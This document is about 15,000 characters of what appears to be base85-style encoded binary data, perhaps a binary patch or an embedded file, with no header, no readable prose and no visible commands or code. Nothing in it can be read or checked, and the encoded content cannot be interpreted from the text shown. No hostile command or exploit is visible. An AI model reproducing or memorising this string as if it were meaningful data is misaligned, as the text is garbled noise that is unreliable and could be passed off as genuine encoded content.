zhV-1qT~x~z5+S5`1fWp3c8gV?2I{IgGStO4@L5}@sMp4hH6EI7IK#l?9Y@Hd9>zm?GWR)z;dIUr{6iSCN59tuG4Tc1R zuPq9J45_e%;N+! zeoPUdCKy+Dr`9tXU=)JU)kc#0ix?SK1Mv`3Us8-?>R4A9@fWx4KlbJdMKb$NT?1%n+rL^aM1vgq}9 z!4j}h>{{(#IZiVcEoRL(Mz*beYMeqCG8A{-wZx}Ydg(Z2>u+^0P)@8Vd)m#hjRP&; zCKe9B&Div@f1pl!vP_QFv4K0@Z3~W*SH>n&JZY$sfpn_TDP}c2o|qWzy{e>ZRMo>Q z=JTLt0;V8v9K8!G2%5mv{`epWUT{TdoM>0Jhr5Eh%@(qjsoe{?o509qB~8{$#w)#g z&@^eziADL<{a7^Y)42@b-Wfvl5vyyjS#V-Abrtc(L~sq;cC#QTZ6O7iPYxrPFBk46 z-WCYsR2)Rd`hbD3sa=~nc6I|$F+hYjHOdAJsKiB4M(nc+i+Oi3QI_(#_7Bsr{bPsDwx^Q&})=3iwkM)SmjSYcDjxHw}_<;kpYZlyqg;c302uPhT>>AZ+5|v z5WQucI$v5%Ap&gTwkrt;h=~K5vzweaoR4EkMsO@e6<#jvOqw;XUDu683?KTys#}CQLxIfhiN1Ob?8v)U-1{-mxd#DcwOnzZ)a=b=H zMZ2@9li3v~0Hd$?bhsqf`2Go;0V@j02*b&&}d$wx4xyD8Z3l<-&XsMM{l$EjHQS>WwA7*ZS5 ze9Ng7v<0WB-mb&t>SPd{5rLJ17C9vY^OSMy0gGjw%!CE02ANAN8@IDoBvpb2Q>!K* z{{U<5h~BAYrj=}&Hf>dHmFVIKES9JTeX!fXkTacW3k_z0B2WF5!^gzHcm;l8gX7%P z1k4UhmGj0HU9H$c!LMfkRT-?pAQbMGs$zzvo>`Gg05On*&SfSAFABGuyNoFJ6hccJ za;r5wN0M&99l9#*TrTEXTkDyc&bS5(h=G7KFyVtE6FbCkO9R1AAkEJ&pcpEO}LGo6h^%VGb;~_~6q=ACjn7B|49G1IeE`OT9KSsZm%E z7uChOGU={5gNRncw5?pmoLsc0-nMPvhCm{k3RPQGnZ}}8$#=qm7Q16I;D~mw>`#tW zRG3+EaFo~a1uDDBpx71IH0Gxn zm|!~VhXWY!TiiAu5Y`HcRhJKsb(=bM5Y}*M*veHY?0=dA(Hn`h4?dwqjC;{gUNz$ z$6UB_lxELHjLHiMBez#|2U7}Mf!;RLiD+KsFGYPr7G=oxtdKa7^N zn8iXrjk4A94j-I4fByjQ3xXJz@}``lUUTP&FHQ{lGF>ya*kB6OYq07EBQwLM&RE+A zcgEox70f>#aOs2fV}e=aAHPgXt`Ar2PM&MHf8&gRY6UEsdY&O!F!~9wWnBPY6m{dA zCXluO0pkAvB5!q*CJFiQVjF7{qBnidAA0r7ZxxX@o3ElA4PO5MH>-B}8}k|v3_uFq z_TzUnlGu{hZl`;fhtP#4&;ti+>ItVB2K4NE%R@8mXq+hHb-K%#YA=c0TpOU&nH9QI 
z6?t{173O;4n}RN*nTuPM@?OerQ6Mm40u(-Mm)4v^yjzj!uig!k+L^I=b6z6lX+n>0 zdzBq-*ccZCmTQ&`7u$UJi5m>-Y4;Phz-E`j$LaOBf@+PJ2~o|(9@iaP6alwAlXSxs^~^#=V?1Zs++Ba&+tjZuUU=M~IJ3n-27dW| z2cgYOsHDfn`tccM3LhZ>wi*R;^lON91Hq?-yunQk&+tEarE&21zFfprn8ACmJuh|4 zYgrV09r3WP9%fq^Sa3hQJG5XM5fIiSG`<*o(Y|4UmI5s;uGpXelB)ZyvfV=((^?|& zan4=|ek}@~a{`pOqtr}X+Sa!2%o-c!WOf4f9|EII+&PbJ&ek$=-hjBILbBN6xZ4|Z zTvw@%KP&u_?wnyeknX=t-Fgc194&G92J6#z)*=gWNMLqNs@0fjn?SnlX>Ub2+z*yy z1==-;e{g^#3Ka!2ve*qo#;KXUpcr#;hT?NAfy%icWF!&aNCGN;N&?frSzJc3MO}6VoL3vA)x#d zzPJs|tL3@jfvtkLl&Vr{D8qQQ2H2;vTa8+lv;dXgm4vEHsly&%R9yGoa?4sPJ3t5*b~MT$f=~UFxGQI*G7$?AUXt> zcH={OJTS(I$4kx`ZJy#xcFPcAh&xT4R@H)BU3Gf9GYep4Ai89sqSyt-eN za@amoTrLhd+U=wkWJXxGE+nLIl*Ky3e4qL#8&5X4Gxa(n|w@7q;)ECdu{s3c$o!57IUAKZ*KuTV+xQ7eWUA09I>e`ApDnZM3engTcK) zU9tjMqn$-w#!0{)MA@-r^}t_VXn@p=P(}vz#IG_IVhvc(F)1T zqFy_TF;S=AdBjAxn_`3W&RuNFYLv?p3xTDm32q0>?CMzRGlsz>8l=}HfYmg%1-YSr@09JE&e>(Q3V-RSnLrw3|z%i-*X?9&MO$4cBwkM(ky z04fvgn6@ISwvc{tyso40Vk6S_Sr!Fm;a;avo=ug9CBeQBKVF^Y!Et1)eHkmEydFyy zIQ*fGy;9;EkH-2jHy;;+Q`+)XS-nK+w^72?QoyNq>MvCz; z5>Gr*E#bR85EC$lUy?D)&S039@rD7zZkzam4UUi1-bPg0ZaOd-Y~+JpjqVaxyvG7P zgThzle3kwO_)zKV-a>%+LbZAjty}LZ8@wDr-czUS7aJ{tw5E>m4QDYq8`mYfzjsh% zGh}q^>vJhuz;5h^u5?G|K4aX4v40p$J(UeUWqW$!^)o)bvRMN|LDZVKS+SJ{c=Ue| z8pRiHKJVs#v6?cJ7N^@l7fqsyd1VuA5JbAQJh?%(a=e$w2nH8?wJtfNGf_){qHF+5 zSy3mb31XsW@dc~7)iyg4y1eiphGO0f9|JkW)0dyY+u`)!vx{S$l2%8J2)m?sIMb0J)pZKkyekbxlXT z^0czSc0Ltz2&F=|3~FlMgdOYxxcaWyw)>C96@&}tH?1*}QzC<&ExivMe9M{pDw|7N z9#8B>M^P*k`a))y;$@2sDRvpZ?*_mp1ZpT1O5V6(8;jb|^;mdS9HyWr3^NvvLi?09 zkwwJ^pJ%YjWDR>{o-#_vT|m_a$5Urp@(gsS#@tRS{t3LMh|H*86vH?l!)RL3VvG!( z9=&2WDO;l5N{BWy%Zqf0F{k$6escoC<|$-_rKLtQ@Z!lwC;bps#{lEz+9awCMBTg&hzxc>kmkS5uI2wA&fOT!i{P;}3F&d!rC2MVkLgKW37 zm1J)NBh8J6A8CxXonfI}##H$IE`xR1#=-$=g($f|Qe|rgu_~KWZYD<3tKwu!%ov~)HP%Sd&B4@I?ewWx<=rtD=`55j)i7}v#6@mtRfCdUl=C!N>&y6+{H#!h zFx2*%eT$k^P!E1F7o;+yt`0T{sn((Lp;gt-6a5j~-T?M7s0hi& zeTVI+_ip0Cw0q9m#vK={)Ql>J4$_Hs%`2A_A5swMc6q;c9P&(;ctr#|YsfxM))9;&FxldS3juvNx|u2XK>MN}F|E{lbV8JTTt$3tg*OyVA!ZtN 
zN-#;eB~{?W%sk1bP^Ff3i=$mkp8A*arWl$qVvhv!mLmj5uuXT1>Q*k)z`&i$Esro5 zt>#&vaZC6!FZ<(8+`d5-i3RMGYg(*1Da@&D)?MrbNQ%N}Ee`9+iV@z6FU$rdD&crJ z#XuU|TDcxTQ))Vw!E&=d0vW=G#m`cmud+4YPt3 zs2vn0o`QZFovxC+>1VI&G8dX87G4djnegU@!Q@a^Tb{$<{4i;i$N5w$K^YD zR8d^s{5KI}@pgi~K~5~w3KTwrz_HT$VT?1GW4gzlau?>0`VPPr-P~9-Kov^jwp9Uj zE9oL;lcPTmBx8`PFWIi4+2UtZ^&biwz|dDP*|{%XZVkHNtzE^}T^`H2K5SGgzM)T| zMU?L0m*JRE;?+JoK-mXP+4CRMIgR8xiy-RoZKU5Fmr|KLA92c+7y&!t!NaLy2HR-G zz+MYVxUvjXCr-+UzidIMggMWfk*0GB_!OxvY_OEYhAW#jFpF>)Rzc9BhzO4-U>sF~ z$1?7mh>T$6z`|Q%Z|WhvCs)I4Av zj)j|jB{ecvr4{^D%Vbk5xMpT&9ZY4%BWd6$L6@QN!2pIpdA}4FBBu|srYvs|f?XmD zemQOdxC{Oi+AZQxPB65mi>nBYV(%2%IRFO3ov1k2!jI~9{T^J4i@X?Pi`IR;+}{HRM+6d`zzsdE6Qr(rAk0j z3=*i<@L1Jm)E&(L__W@Jmmj1SqlW4-_YOWZ7Q|UQ1=X>3_{DnCO`S4Trc`6T2%H6c z!OZZ1J4u74=t;Zb1AFBqLUvyK#8$n9Vu#e)io10lvYp*O&Kqw~Ei|^J)$CQSVbDyp za`02i7T9y@YY-b=E(XS6iD2h#F52QHjt(nDjma(o5^Gx@OtR~5WDpATRa(p-DyQ_L z4*=23<|{nW)5T?gEM_AO6qZKn%`J9-MRcFMG=B@6O_}t%+|M_ zGZ#bz=F|qM=39!{#@S$52JUY$c7*{RMF){NiQYt@3gsA@Rz^9M8o6fMFUoe)#L~~s zV{^9Oa8yI6vS0KdbnXmp2FZjjUs^ZJG+J}y6G*wi{{SNahM~Ip{pegEF#ZF~WucHn z#|tlEP|?}j=r5C-R^@|yxq;=+tsip>t+?tg{Hxs3Sv!Eo*tf%bZii$0n z>X%Ne%pcsU{nVpr$fBzgWtqXUw`jh&aJSiq?gsrW08` zLAoVJTzDHj{x1nV{f%`-#?5Cjn@J4cZHo4lU6fGKQ%miqSDBdR&c2SQuIq}N?d3M; zDziH&IMpvz)~l~0hD|3!Tcb@*%7}X$%JgYAuBO%1N5$(TaUnctN>%q&79tU16PV~opU zNQNJGgXqF^{$Yy#Axyl$SP0Ql1kxJq-5V!C&IRo8f_if@E1c)vO?Z4lie*4kb++N% zVD49vDK%qTJ13-ff)`YBS6m2frE^P(2+MF`TRW=^QOP1X8$6dr0^vF56TUorvftgg|W1!zX7dP^m z!ZQL`IlVcoCqoaVzOhoTpv<9_^MsMCVK}_pOs}yEkQhF}xoba!rYaz<3(juJT_0JLw z0h6_qsX9Ag6v)>pz{BL6=67X~Hm&f3J!+wxXT@}vgoZ&X4J_L(on(~PYMCp8nA-rM zL_Ru)YtH3?U!s}Z!CvZen*o9ywThJT%^GjnKC6n>4vp!%5V{W* zdw^>hD$TPNX!3W(hT-s+2M8~CH&~g3V_j<97imFFvq8CzXwWaVOavjmO_fVJb*%|c zJ^|nEhH;d6b<}KBYh{Z@7m0x$+YbB@%a0rf;#Olt=ajb}ar?T3XiFy~G|c2IWVQH; z;Q0Vy9l-MQP_^f!uAlj58wbEF^vg)9iACv1u*Y@}{C;JtUMec&a|5j;mUb>_W20Ls zl|SufWln;|h0YBkv^Cz(SbTjrme-0q-eu+XdyUR2VHZ0AljWHpb5T)Y%4BX;!T5CU zFzmd5@=|Ay#`c`}RX`V3?C@klp+}R3{0%owz~nbf^MTonS&A*)n7C`k1`~W!=LR$! 
zCOHuegaQpXy^uLkC#r$X8Kd&oR-I=Ivg6_bLTgw!_G@4jQ~i zGh;+9jZoL3RCuuLGFDyQZO!EHz1Uf0na534x3UI}`UZIM#c$FyXQuQo(RmKtXlc#c$7=?3C+S}q-tre?YW%m9HHCPy1#$t zV{Eugoh8+5A?ULnis)x!cEX_1aZr3|aRBek4{MD?)!sXmgrLTw{!kOhYo+s#F!B&4 z+yj0kBEE3|{O?h02cgh6!2v6P;8tnBL~TlOR@Jwv<2f+{X-1=_cGBzSEzMiZ?_-aE z;KW~F!$;7(_X?MWz~FX#aSm*HJ^_zDA*stjKaS%;W|Y*@{Bhhr>khEOfF? zuN&oh7&xfZb9#RYdeSE#<`#KmOU9AspvN`!NT-Z5qfl z+18!Ii2)j|OzbZq#$(=$dz$zI+3z)bcTgzzQ!p-!gE0+C?iOp58mG=co}j5?plg@9 zsbX`ufzYP3Qwp|97QWdQ+r!B5^Or@1pFvra@W_?k5VsD3 z;|1GxJV`n`7k3?SAZ3Lv>S3>95E9EuF7IznZ!q-zyhW@26lN@|7qgxS>;>t372-@* zRWz0F@-r=7Z$?z$SnzC23kn7Td4)rQjYbx~&Mmi&Ro{Fe+MRp_ZGNbN*fp;1-iV^% zb<3YG!(&XF8b?k6@|d^mwBFyaf}T>ve3d8<=q{Mh(C%+ z=Ajhuv3KI2Dg{p3I{Gg?a{Hp=*Z1aFX95JhO*#pZt#_7O!iv6hgos56YQS@Bz>$SE zrWvWG7}`OPkCK=RdZVBqtSR3 zC?~{{8-ELo;ksVIS6}IOnRB6ISZsd~_blGaSLztMCZP-5h;dh?D(I@LlpO%``uRgCg788b>9T+D|~kH8=Q00tPKb{YwO7W_v40P`)1 zJ7HSKc|n6l3|0RC`~Ltj4!*2J6znNi2<8y#D`rxR8*=?>H4S!#v?W&dRHvB-1i}im zVNT_x2%xp-_>9fiWIetKckwX#Gor51#46s0HkW_bQk)= zy9NPMV-395W=SzXajo1rhPU7r{=*ZP8I=Ue$xzCNn~yUB>;vb2;iay(MXa^Z#m)^@ za8ZD|Xj->;%(aPgo^hDmAEDzfY*N^&Q)h3D!;MD6VARCPr`{+MyvWjkGGZQ(8Hcc{ zYt`W1x+Oz1iF+_K?Ht5G9eS(s;BtIS6q(6CwT~_+y(Z6$aVADx5fWuphi}sWS{{Sb~b;o8^xCmcO z4?F%?i2JDuFfR@8)vmEBr-^e)QZ(c8ndus!?x^ryS)s0odbAh@k3Y%g8J+e7_O*w8 zDB%DED&pspEcJCW%PH7E>cz!WOn5&6z4RdFHW=}_Tgeph>xclk{{VQWho%@RM!;f_y)R+ z)6Jvy_}4HJ|3lH--7n*Zr?dg{B6SyR7pwq1OEBpMV#gaEzx;JTd1FI2_=45KSk{V+RTW#feuo#Vyoy|5Rit%B zWuDGjW5jofe~>1L6(XG zP$_g;%mFKfKuEk$xpQrH$}SD?g^ANg>GjMo+B3DigiKpFq*M!>D}@{SUbPi^eH7L; zWYt(kJ{nuWR|sx_!yM>dUz%EK=DN6Dw-lTm#yiyDB!(?i3vRxEa~Mj^5W5ES8goWr zj5G>(pl*|o$gt+ksHMr5#H`goSM-pq3g~6Mh`2{)A*lVp3)d|gb8QOpPnaEITHr&z z$P`qd+lMJ|VXJj(rr|(6QHa;`D^6I|(9URY8xBseMo2=s#-hkQ+Zw_P>AsF}nR^K` zqb_Q{E3ZvOxd_cuzVzTI`MBPE^#Ey{VCX%`NcQj>JYx6XA~F8c(V-qZ4WbmH&r#h@X4r{3xC|q ziilLM~#dKL+$1iw~(0y>s`yd zYRo9U@NqHin4jRXy!nK7X-Sod#xd?If^tyA*CVlEsbRMBKm*AKk(=BjYR6G^xQ2u+ zNr{#eFDw06Y{yZl(OBS%*;cshNnGP`6EGpL?qmZFSDS}p4rtOYe+aos+sm!KYKv`r 
z=0!TDs*Ho&zt`x{3}75x`TN5_)~m`ec=+N8Gl7VP!r98n*xe&@!rrR$Vd~Wiea1TH!6$tuQ<6*N!%7MYuDu4jd)fg0yI@OJQ-{ z%{Xw@X1fLJz;~YstJTsD3LgSgPz`cn8))JaKETDMoD3~>TMXx5<;ZsJ+!(4byI2)$ z>|wz?lqUD^2?0YbR0z@^hzuguhV;2j4d5W?Z^p&0jk_e86}GOstZA!9G(NgTYEhH5 z=`GZVSE6pj8p`7=*9BsqaWEK!vttZR`y_A!&u>@ZEJelg(+Vbim}3DA6!cx)EBVlp zLty~`ip_W>gdKB6_%>DKQ+c=&u5UR3Le~V$2~eCDOe*rrJlrdVO2VmubuADPferciEoMby(2Zb+<=DMB!5*5k57J zeIXn);boiFl5~FFJ zNY7BtWo^s+WgS0V+T4iC_H(iFo3Sk9S8$wa1$LTr^}hMV+$ICV#=_o^KmwGGVfmJI zU6%-JIY=+l>-Uas0l2(9a4C}<-VnxetKTC`E(s6w7BSVG%1)~~m(g6d=FX-V1SDDD zOdr63V)-*)al=f3at+$9IezI#Lpu=jYey4-yEVohG6Zz!;67KcC%v~wH!_~TMm;y7BKNw_L}g>Vbt<6QSFnsk9Fm&CEVsW>rT5|@Ik91jq% zDxzFlyf4(Q5URvV!$o%p0Zf)z`%8xLHcMk~`Gj|vGMv%Wuwbqvj zkfv+{_8YCCarW1+W0x?=HLa_D!`muV1<@ zds9rK^ZVqAva;*9fX*evWw}ji&jsNvgjsj{IZh4nIE_gHajM|ruusf25O*buYP!q7 z($E+xhhtPaikS9lSYU8hv?i1p?K1g=RIUKwQtS$}1fZ^kErf=dEvdOD* zIE8nzQQyq}0B7Of3h7*3!y3WXh?QfLu1Jai;8Tmw{{X%upy(iLV|ZjKBeXJtE{@0> z&4ERfHhf8}b+Ll%TjmC|6AJn(rUz2;v<@>~FGP8Z8bk$$DGj(GWsCt6&>Km4L&B&& zH*wSYP&Z)NSR2RM)X)AmwZSUI5zuVfY!heXTW2q*;$D%%c(EATi61xk2@H;*jJB9z zc^RDwkYR$@Bvd#nEh8@(RY9}B;J4V8g`{ZC+-Xw46D(vPgcTe4I$Etk%m|uqyHN%i zr&Rle3BohrXONE%$e#%1xbWz_&woi`|-LfTYg=UJ1uwbkPF-VznZl(sw zZv&5#bQvTScUm=s&{9HZBEX=&8-3s}I1Az`azK?wfkojsik()u+_joj?~ndBdAym_ zjxL$lnr&&)tXea+Uew-L{{V^hf}Be976<`DPY4PXmVC(d{`3H>I=57mn!|gBu}K6e zh&P8+&h~i-hM=MJQN#i*k%?6bhDHO=Ro=b@OnD{3uoai-T4CpYG5Cq)=GLNpg(_!w zTBJAz+?v=sO`c~oD~j*7{{XO$J|XJK#>-_rex6#GqdCf801&}SBm=Z!J5x3tw$Wvd z9`Ww;*0G?dQl=kk)lLj-Y{nuIQp4I4fO0Ziuhi43+t6bR7%2NF@BPqwY1z8Vp|?@rGp?g&);UI6xRcA z#rajHhx8L>T*`NAF#sMS(UV)YFO;*^;_cjNnPt`Ohp(rM#{<{jpG_`n~JZ@r6i`;T<=BDE~gd`nX}8&TYY7YZL9+5_iTlftDU#B z*z^R}jjUmT{{Tkd5+cY@Ci`L)vnc%wFC%?(adzC;Dh+O&-Xd?U#4SR|qh_NjAUh`L z*{XMmTZmZ>@^CF%<~1Z2cXBg}JR2#LC!5i5et-GB;*2MUgQgm&91`o_Uy}52> zwWQDBmV zB}k{>BpXw^K6k-zS4S*#W2#w1*`C7un#2syzSXVEPff{(9&d?kBw^?mmr~7{xo{rh zSA~p>jPvSbI+#mGk+ znPS#9@>JJ*KI2!}ag+mvWZT`>8)P!ed=x;5x0V zq06Pk+dZ=i_t@n&y@8ObkPNbIgNci44lXuQ+c6vSQ23)4W0XygPbH~q(KV=2*x=%} 
zyi1GEC|Rwxuylo=C2}>O50cDnWNS&^YDXJ+fFKRr{5LCmVCrFHaGWOFwf5er1BLYeKTX67h`6 z9v!tyHRd}g@JsCEyPX+V+ht8SYBdlvV7hmu{{Y%692e1T)_lyFmak5pl~~Yv65o@dGVH_OrD+BTNt|@p5itzW{Xhm%z*g8!@uI8uGE&TFl~w zj4tWT)HxhA#mRKUGi=yG?tE6hc!FOhllto!!I`ud2kx>Au|**4`@Yfp^pSl307e0d z@dYfnJPkskrf6n3kx{)$rgTlg30`^{`WfiB?y|y-uxfPc$VYh6x9!MKuuTf`bsBl6V zUM@Ds0m7L(s0+y8vqKuMp)OLITa`z|u__R}h=H4dmLc6bv{;KZN^OiXT?i|$YJycT z+G;e)?Aq6^we1(pm~>2Da<){j14bUoLJD6hU0!n?SCH7*5^1*>&YNL-Nvc}QT7HmP z`U>Ajmb(ajX3;TLXWl=ZKmYH)$+9`YPVqc%ot zMzGjlp84x+^_1?uA(>^v1=+u4{;u-({ccxaE#RKWv}oSY4s%dx373jup1wEHMQAI_Mk+KZ&GU7>#CHqjVAbOoBK4lYs<4q!l&( zWfb4bu%r91sky@GXA{|PGcH8CNQXK8h}DH(W^F#9Yr(^#crciULd1i=2WI6vkE>rV(TYGYzyJ2q;y5@ z0p3Vr>L`=6bV`ENwzl6*#U{j!jl8hr!LgQ|MBIqeD1oPC{KxHq z4(A_!CN(I*_JafcW-Yfqu3BFvT7(Wa*h);SwEIdM+%;&s)8jB{0NgOs*d)&1RE&P8 zhVN%pMj={uB-O1Oh59OEmS}W01KNFBo=P3S?R%Q#*5Iu!vVCyALBQKNUnK?cR&LK+ zq*+yx(Te!K!vtVVa1$cO7a;N7pyi{e)j2yWh<$@E+>av%z^$X#3bQg7( z5J#5qubaP10#xh4RI4_mc;qhT87)DsNg`L5hg%BCoSWgf*25t!7ou=;nD+HSur-#g zSno-EEn`tb3afXR!FY3b#H8C1_Eg})-F?u=Y^h6uy}=T+exJ_`=R$$1?P4;%$wwy(nX^o^DwQ){g-9)RXT!}?66=fJLxj-#y<8bJ2Fe}zVM~iL1%h9gOolAE! 
zhNcuf&St4yW@K%kXmbaJS8~@_`-caEGXvz7y8i&=#`Lth-G9}oqsd6uv#|Y)(O}X* z7e}HEj?StkUghUe4+b0&-Lxqx;ewI}w61X0aKqvAZ@S|q5Hc&0#bX{w*Vk;TLA?Ic z6;!F2yHR(S9YqCBH0;p6kCvbhA}oAwru^Tih@y(W@;lQkkT+@msC^NfY_CU4E}Y)d z(@~$mPxme-i*Ol~8KpffZWB`PpB(T8V9ceT-ZesCrPgSrzyfjNcNsZnA{mAO_T~NWR2k zfYR_5bP(C88l&ZYO1xY!LIzI@OKTttIzd?GP=G!N zWm;=tZKDyxU=4>a%UwXian?cN4Ac9RM>ivFFYiR9vNxz(?vkHHej>D}&yyUEHHv2} zdS$`ptj*;w&~9L+iw7S+6%|~R3r%e}E`c;+@#JopmvNeKX05G%qH-z-(5_CVB3&}J ztNhfrn+EtAc~fxQm6e-sYcxw04t{Ov9BvY4ouq>l$8}2)E}<6g>bAuyAC&y z%(Yh6#+SKyN~`-8(LdRcGs`v-X?*^Yh0>tXRm^~|JqYBz;;~ZQs9BkMU1L@y#3Ck+ zZmdlDfV{LBXq)BFEZ>|4ej?r(&`bLx81CgP z4Pb_DgEh@Z%h!1^c~07k3-@9oP;CqGcMf^Ib2tT|!ei>=WfJE%w8M7dw^z9aO(ngV z7Zj*T%!N5VUVpKas+}kIs_pQCSS+}|=hb%ei0TS)6_!jJi{uo6o zSo*|!5$!c>XZ}USQsYU__&CwjQVx$-jYi+Hal`fP7U!3ioyy4*nV&+KJk7@ja~FCt z^cx}ILdL`Itw*0L+zaGJ{28yB*yP9Nn#`r8+l**Em#E^tC14w*$4|N6zbe`t8Q1>+ z7C^6S8XK##;&JsdP*n_=)9uO8H~N+}iYK_iFjcE~l+}(Af`dg6A!f$u2&t2VLc%S0 zC5%^Pa~U`aR*gf9?@^Yt)TBvO~u8oDPtoT zZ5dcv%XaK7SZ`viwK>T0_-+D<*#m(n)p36A^dZMxe^4`g(Y(R>f(&g1ob$6-#i&N{ zrAI;+)0uv--vi+ZlgWlmUnXtj)YSFV8Z;{LbE)y@|zcHz2 zmEjK%t=MJ&Gt3rU$l%quALa-GTvdKg7W~vVIIi6<(QdrO3ieb1HTMja)DmLs^B9)d z#J=cpKxM$E$XKyBC#(fAnmt19Jf=V!bmJY=u}8Dj(MEHb=C-pg&A&v^cPWzNt8L6G zYyuLza#cf5NVGS7z@RXospV*om-WB;mr%h-cXhzn`UPZH&sw<2^ z=xR?)9OpH}7U21p;3tKkgSSXKEc7ai&*%L0MHAT1NA-O`81e?yB z^9bQI(q@GRFT2LwW})SVI2tl^t1n~%aCN?>qN`K)*i>ALe^;suu~H5qT$ya1!s z-VhWL?(xuw9A=GNYzUrlQ+S52FsB^t6@s&wmMn`{R38;J_7JAN|!r*M~0Pc44zc#jg4UPZ+fh4S$j^XY>K#Y^(H7$_pE zVLTz6Fz%4-Wq#He@0K~>$ZIx4zfWScz$7MV9ZZT#s{ET!A!{%or~$PEv#+Q#mX=L8 za)r!?R1G{Wox5DiXHSxGH-Zg`ii*=*PRydOxboOAdV^IcSB=L!+T1gQ_r)U#y0B_g z)pm>o!8bXBcQPFYS~Ux4Y1M2qg!F+KDmd(vDF#bb0L)w+;o)4E=)%%qk$aQS^sl>vVAU+P^Ah+_9?<`G-f#<2KCRIfSHC3klUw7rL>u_(d$EgnEt^}b_! 
z9+mD<;0rqWZp9lO=O|>~e+>_7N!&3@eWwXz3nq7U#T9}ca|(560tH4g?2b9QJB{Cn z(+Ki0P_0LCbeny8T6U%{YeEqqRuKxvmojplUVG}+4Uj%#no8tSk$%(`dr5I6T#^D`8iZdN__(JgnPVHxfUG3(4`33x2P z0-12F!?)X*h~TB;RidD3c#mSdyvAM1X0P{)Uc&V`&4w&rFnNljc0o);;*nOoW2{D{ z0iHh%4eI4LP#80$@$iK93^$fWf${IaKXLTyrJ4oKf#wNWF`yk5N8%|JgfkDBvrtxk zN*5D{H3D^8U2Nm!f>S~RLb<7&2`M2J?KK4(VZQR72Q$ojoqPJT_BIwHX90E( zaq{)O7%{Ug)_j?R4J3{XTF%}CQ%$XEd8@5e^2#XjeS8@5bHg=qop_QZ+_jcvW3`RJ z*)3pe0BV`6T8I^rvDV`D4tFY{VH{nn*K`Z0q^2d4j|8}19w3-EUCNcjrH3x&S1;3d zy&DT?6zB}xJjIWtcttj#M@O@FJ{YNpNON2^R1t@iC3NtT_1WtWnRzDM<3_5%@=>eQ z%^M=LB(R$S#&irWqw;wgbXDTw8Bh$0#^|2kQy$m>G-ecn^H$ae)%;XJdtofug=6X= za&|tE=Q|d>sl%mUM@JA0A}M83@pruXt|hr7sfCdtb+^J&=wj)H`2I}4drQ5xdYitzYtGRuJ zOE}bU*@oZ^&L2!wSy5Lo1-Ny&M?7^4F`xck5+QA{#XiMrXs&uN)?pSdH08*E=|@v$ z}9F;*qx#eC^6cp_5myvB|s0&q@X_%LO+!g-3V z5)_kPv%15y>#K``QX8t57@OykXmY#U$k?@J?Jnvu(c(K;E~?ns2o6j}4)q$W7<6$0 zrnrsn4HP%09cs6jsBqyf*Vin>$->dweYxD@KNcsz^t}H7_E*dmFpbAt>!h;r7VifG zU~2BU9@c(|VL)$0=a2W8gDr+O=g2+$PWenxegHe$#`uO`sZx%*{7<~P;&aO-rKhLn z9inDnSx+||+R+)ts-O@HjdGPv-XBtlUxC+==arJMe5K~!zo>#>)`ZC8<5LS#tv5zL zE1y=PhxQH9z)_RKWYkR;2-9#ySgXRZMyr8rIYV`5YelX8hXp*@V&k!+J5~k)6Ix7f z_8^&=a-$3rW~${^#G{Nz4JV15cf#@E4cO^?s$?={Z8j8n42+nytYQQcnkc%ZIANoP zWc5M#0{jgQ_Xl6KX`tE_hB1RI$ZLSaqG^YN1Po-uNQ-v{9uqFh>N{Z+Hv-^&^5_pq zzW)G(Y#PMnvbmGF>1VDhf~bDHoY~4SYXh~RWUu6Y!Avhm?8|dj++VwshSe0%EM5JB zP%#KR1GSpGe6Q|Q%wO=j{>=e>J{P$6ei0R(a}s@-!$jh(tY35kv5F|$IOai?7N|C| zZx{VlVXf_Y5`-iqnzxzqnno#NRXWET3Cg+Awq=X#-BWQ#jON3Dl;3zOSR%<+S(h-} zu};3R%9a)8!6?i{a%k;1S7xeF>0LnqpezjeL^#ZGvk=Ievw@(6*4V5yM@$R&7GJ{y z;$3Ogp+T?J^@n-`A;i?nspd2*%15K(dK63z8aTy6y5IcJuPs8q!Vsz|0}|}Du$+U3 za?QE&e%cbOH%k93o)^Q-d1PUCB6y&0HPUmp@|GHn!jWk z`AqS0xl)Z1_dp%F>H@KOb!!cmeku?@#7<{pwpgAd{Dijd1wBP`Ti_94aDJKzO^D

    F)N}|uTFQs{1Ki>)SwHP_ zS@vlC8{!WUUF$FLHHag&TKFX%RhFS^%cz;B%9hSD-Au^m0_O+dnT68#f0=$zHou9EWiVmrU()es^ElS7bi;MGiHB=S=_}P)?pnkLZq5EHUCN+fd`PYY z<_%q-(aOH2aH%0FV7a@QXh*gIFi1QLk37JNjU%zsOz_u;{$Ic+InMb%2~H9y8+y-o zq$ik3cj1GexOjtk4tbUV5|B}hPr%y<+~4#T=!^ycKxQslq2FY62Iq`c+6G(|S1ddm zTUec;RB?}qT;oHBu@z@?@<)A~QCwJ9RW)xHC=#igR#zppS7B1MoN653UYF)U@fKHi zHk!aL^R;A%{Sf3*&kwXE(Ze%c#X%4TekII>Q&)P^XD#FnB&P< zW>q};syrp`=rAudBuZ7szo$J4m*TCFR;c;g(U%H8%+-AUAiBJl?V72Z2sTqGpj^Xy zL0r$)vf8ooh&B!4EYX6>WtgEww;HpzqM(m0MU)NS_X#CYvou$XE*4^JtGc&B-on+1 zTB$|BjseisnbZrl5Y|@jkoD(^(TQPQ1mf2H8zuK#g(xj~)BwVcR4|sp4(ML2I2wf| zEucGyE&&e6T;AI4wNXcxGz4$SZbW*36%0+xRyVpHqPOo3;By#P31bC84<*hAFzt&V zL0Gm6a|4*Tjvy>+1~`VHT4!)N8&~L<4kZQnm>0Ug5Uyu?GE~~E_rw}>Q*hDth^=;7 zcM8!9%{NdRBHrf3eU9N`ey3jLdH(=XUwD|)9wiWqSyyOiFS_>i0RRduNccURbbwBx#~5$1ms=q2QSuz#Vq&}H!2?it(CIAI%mCep zsjH|<74u|I1y@7LE-V+hS?U_p@Avb*O?9GUI zAy-Endm3XfOFv+)YnSQHZ*T|;QaMw|%5dO=rs$YJuXBbVRW0)_b=D<^j*+s5YeeJy=Z3yND2Eot zurK#cDJ*r;GTW9G7rssC{{UEv5x*p-%lJl=iUx`l*Op&VQ%p53syV*n`8~lyxQEGH z4NOh3s?B3(YRN@^o2!sL5aRtr%e37cZ+9TuQez|hDBUCGm%00F&3*OHqG*%%X>8k z6S?|P>{xb%2nE(`&Hn(iq9sc3=)2U@DwkPu!a55De|!!Yuo6n{w7*PM@?z71)r`*^ z>MoQNYyxCr#xdMAxgGrlQY#v9n-VaK&g9pK-Q$N*s~YgHv~T`~x*la`Y713)R8gAO5k?rq&TzD% zxGU5}RY1jyk^cZob2C!o1DyfK7CDI_yglQTG)s)|jg%I~B%%C}8-e|iEwg78KWCJU 